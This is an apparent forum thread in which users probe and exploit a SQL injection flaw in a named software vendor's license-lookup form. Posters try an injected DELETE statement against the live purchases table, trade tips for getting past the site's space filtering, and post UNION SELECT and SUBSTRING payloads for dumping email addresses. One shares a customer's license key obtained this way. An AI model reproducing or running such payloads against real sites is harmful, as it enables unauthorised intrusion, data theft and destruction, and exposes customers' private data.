Easily hacked...


  • Considered Harmful

    http://fixtunes.com/purchasecode.php

    You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.

    As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!



  • That's horrible.  I also don't like the idea that someone can pull up my product key just by knowing my email address.



  • I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


  • Considered Harmful

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.



  • @joe.edwards@imaginuity.com said:

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.

     

    plz send codez



  • @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.


  • Considered Harmful

    @medialint said:

    @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I suppose the wildcards are there so you can work around the character length restriction.



  • Bad query:

  • Error #: 1064
  • Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
  •  

     

     They do seem to remove all spaces from your input.... Anyone know how to get around that?


  • Considered Harmful

    @MasterPlanSoftware said:

    Bad query:

  • Error #: 1064
  • Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

     

  •  

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    Use a different kind of whitespace? Like a tab character.

    That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.



  • @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.



  • @MasterPlanSoftware said:

    @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.

     

    The tab character works, but it'll only run a single query. 


  • Considered Harmful

    abc' union select Email from d_Purchases where Email like 'a%


  • Interesting...

    Purchase Code: afes-sler-@c



  • Good to know that Mr. Fessler's code is AAA5-4E26-K9


  • Considered Harmful

    So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.



  • @joe.edwards@imaginuity.com said:

    abc' union select Email from d_Purchases where Email like 'a%

     

    And then:

    abc'    union    select     SUBSTRING(Email    FROM    9)     from     d_Purchases     where     Email     like     'a%


  • Discourse touched me in a no-no place

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.



  • @PJH said:

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.

     

    Yeah, already solved. Thanks for your helpfulness...



  • @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.



  • @Heron said:

    @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.

    Is there any actual limit on email address lengths?



  • The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maxiumum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.



  • So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D

    There's a similar hole on the LimeWire Pro site as well... :)



  • They appear to have fixed it. I now get "Error" when I put in %. 



  • @Jonathan Holland said:

    They appear to have fixed it. I now get "Error" when I put in %.
     

    Hurray for your efforts! 



  • It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.


Log in to reply